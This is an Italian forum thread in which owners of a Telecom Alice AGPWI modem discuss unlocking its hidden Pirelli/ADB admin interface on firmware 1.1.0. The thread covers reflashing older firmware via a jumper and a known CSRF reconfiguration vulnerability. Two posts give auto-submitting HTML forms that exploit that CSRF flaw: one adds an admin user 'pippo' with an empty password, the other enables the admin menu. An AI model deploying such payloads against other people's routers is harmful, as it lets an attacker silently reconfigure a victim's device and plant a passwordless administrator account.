[pipes80]

Buonasera a tutti, sono nuovo del forum e lo trovato subito molto interessante.
Tornando al problema, vorrei chiedere come mai non riesco a sbloccare il mio adsl wi-fi n agpwi 1.1.0, o almeno non credo di averlo fatto perchè in questa guida: http://www.informaticanapoli.it/modifica-modem-adsl2-agpwi/ sembra che la schermata di config. modem cambi, tornando quella pirelli e non telecom.
Io ho seguito la guida bene ma il blocco rimane, unica cosa che ho notato è che la telegestione è attiva, mentre prima dei tentativi non lo era

[Miguel89]

Ciao pipes80,
nella versione 1.1.0 hanno cambiato la password per entrare nell'interfaccia Pirelli (che adesso si chiama ADB Broadband perché è stata venduta)
Se hai fatto tutto bene dovresti riuscire a vedere la pagina di autenticazione: http://192.168.1.1/admin.html ma le credenziali admin riattizzati non funzioneranno.
Purtroppo la pass corretta non è stata ancora scoperta...
Per poter accedere all'interfaccia ADB devi scaricarti una versione precedente, ti consiglio la ver. 1.1.0_013 da qui https://repository.ilpuntotecnico.com/files/jackthevendicator/official/agpwi/
e caricarcelo usando il metodo del "ponticello" (quindi devi aprire il router) e poi ripetere tutta la procedura di sblocco...

Se invece vuoi cambiare firmware ce ne sono vari, qui ci sono spiegati i vari difetti di ognuno: https://www.ilpuntotecnico.com/forum/index.php/topic,14416.msg189111.html#msg189111

ce ne sarebbe anche un altro, che io giudico il migliore, ma bisogna fare delle saldature, e non so se sei capace
ci sarebbe anche una procedura per evitare di saldare i pin per la porta seriale, ma la stiamo ancora perfezionando...
cmq se ti interessa il link alla discussione è questo: https://www.ilpuntotecnico.com/forum/index.php/topic,14370.0.html
Se fai una ricerca nel forum (con chiave AGPWI) nella sezione Hacking ci sono vari thread che spiegano le varie procedure per mettere ogni firmware

[mapel]

Anch'io ho lo stesso problema, segnalato in un altro topic (sono nuovo e probabilmente ho sbagliato).Sto rassegnandomi a usare il ponticello e a scaricare AGPWI_1.1.0.013.
Domanda: come si tratta il file con estensione .sig (su un modem + vecchio) il fw aveva estensione img?
Curiosità. Le versioni ...013 e ...022 son più vecchie della 1.1.0?
Grazie e saluti a tutti.

[pipes80]

Ciao Miguel89, sei stato molto esauriente nella tua risposta, solo che volevo evitare di aprire il modem perchè ha il sigillo di garanzia e l'ho appena preso.
Magari se riesco ad aprirlo senza che mi salti il sigillo di garanzia proverò a sbloccarlo con i ponticelli

[mapel]

a Pipes80
Tu sai sono i file *.sig scaricati dal sito e che servono per sostituire il fw?.
Grazie

[pipes80]

si sono i firmware da sostituire, solo che devi aprire il modem e ponticellarlo, e successivamente flashare il nuovo fw...il problema è che devi togliere il sigillo di garanzia, almeno che non lo togli con il phone e successivamente lo reincolli, altrimenti ti si rovina ed addio garanzia

[Miguel89]

Curiosità. Le versioni ...013 e ...022 son più vecchie della 1.1.0?
Grazie e saluti a tutti.

Sì sono più vecchie, ma dalla versione _022, se non sbaglio, hanno cambiato la password, quindi anche se riuscite a sbloccare la pagina di accesso col metodo del payload non riuscirete ad accedere all'interfaccia ADB

P.S. se non ricordo male se inserite delle credenziali sbagliate nella pagina http://192.168.1.1/admin.html vi rimanda alla pagina di accesso Telecom...
Nelle versioni precedenti (tipo la 1.0.3 e la 1.0.4rx, ma credo anche le altre) anche se inserisci username e pass corrette la prima volta ti rimanda lo stesso sull'interfaccia Telecom, quindi bisogna provare almeno 2 volte!!

[mapel]

Aspetto fino a fine mese, nella speranza che venga trovata una soluzione meno invasiva.
Penso ci stiano lavorando anche su questo sito "http://disse.cting.org/tags/sblocco/". Dategli un occhiata
Appena ho novità mi faccio risentire e spero che facciate altrettanto.
Grazie ancora per le informazioni.

[bas]

Ciao, eccomi quà.
Mi è venuta un'idea: quì c'è una pagina che dimostra la CSRF reconfiguration vulnerability: http://disse.cting.org/codes/alice.html

Io non posso provare se anche la versione 1.1.0 del firmware è vulnerabile perchè ho cambiato l'ip del router, potrei resettarlo per fare tornare l'ip normale, ma se poi non riesco a risbloccarlo non lo posso più configurare come è ora...
Tu riesci a provare se è vulnerabile? Su quella pagina per vedere se è vulnerabile ti fà cambiare il seriale.

Poi se funziona nella stessa pagina si può abilitare anche il menù avanzato.
A questo punto se si riesce a sbloccare non dovrebbe essere un problema neanche cambiare la password di admin, quì è spiegato come sfruttare la vulnerabilità: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability-details/#CSRF

[mapel]

Ho già provato. Non hanno ancora aggiornato il sw di sbocco e ho segnalato loro che non funziona con la AGPWI_1.1.0.
Attenzione al sito perchè vedo la luce hd che lampeggia molto (è solo un sospetto, ma penso da quello che ho letto, riescono a fare tutto con i pc anche da remoto).
A presto.

[Miguel89]

Non conoscevo quel sito e nemmeno quella vulnerabilità, anche se zibri ne aveva accennato l'esistenza ma non ne aveva pubblicato i dettagli e nemmeno un programma per poterla sfruttare.

Poi ho visto il codice sorgente di quella pagina e non mi sembra ci siano cose strane, quindi dovrebbe essere sicura.
Ritornando a noi, bisognerebbe provare se funziona il test (quello che sostituisce il seriale con la scritta "ROUTER VULNERABILE") sulla versione 1.1.0 dopo essersi loggati all'interfaccia Telecom (http://192.168.1.1)
Se non funziona significa che hanno cambiato l'active_page.
Se invece funziona, bisogna abilitare il menu avanzato (dall'apposito bottone in quella pagina) e inserire un altro utente dato che non conosciamo la pass di admin

Si potrebbe fare con una pagina html fatta in questo modo, ma non posso provarlo perché ho un firmware diverso

Codice: [Seleziona]

<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9114">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(stack_set
  (0
    (path(admin/user))
    (index(-1))
    (set
      (-1
        (username(pippo))
        (password())
        (full_name(Amministratore))
        (email())
        (permissions
          (mgt(1))
          (fs(1))
          (clients(1))
          (lan_acc(1))
          (wan_acc(0))
        )
        (notify_level
          (0(15))
          (1(15))
        )
      )
    )
  )
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>

A questo punto si dovrebbe poter accedere all'interfaccia ADB con l'utente pippo e la password vuota
Se qualcuno vuole provare faccia sapere i risultati...

P.S. Non mi assumo nessuna responsabilità per eventuali danni! Cmq se qualcosa va storto di solito basta premere il tasto reset per un po' di secondi e si ricarica la configurazione di default

[bas]

Missà che non funziona...
Ho provato lo sblocco e non si sblocca, mi rimanda alla pagina: Genera file per configurazione PC

Per lo sblocco con questo metodo quel sito fà così:

Codice: [Seleziona]

<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9130">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(set\
  (0\
    (path(wbm/admin_on))\
        (set(admin_on(1)))\
  )\
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>


p.s. ovviamente io che ho l'ip del router diverso l'ho cambiato nella prima linea.

[Miguel89]

Allora significa che avranno cambiato l'active_page, che nel AGPWI 1.0.3 era 9194 (come si legge nel file .js sempre sul quel sito)... bisognerebbe controllare qual è la pagina che la ver. 1.1.0 dell'interfaccia telecom usa per modificare le entry del port forwarding e se è ancora soggetta ad attacchi CSRF

[mapel]

Scusate l'incopetenza, ma non è possibile scaricare il fw 1.1.0., trovare (tramite con sw) le differenze con l'ultima versione sboccabile e lavorare sulla parte fw differente? (si può con un debugger?)
Altra domanda a Voi espertissimi: il fw alternativo tipo Robotics è aggiornabile dal web, oppure bisogna rinstallare una versione aggiornata col ponticello?
Grazie ancora

[Miguel89]

La versione criptata della nuova pass, se non sbaglio, fulmine500 l'aveva già recuperata, ma mi pare che hanno cambiato anche il modo in cui viene cifrata...
Per l'altra domanda non esiste nessun firmware alternativo US Robotics per questo router!!!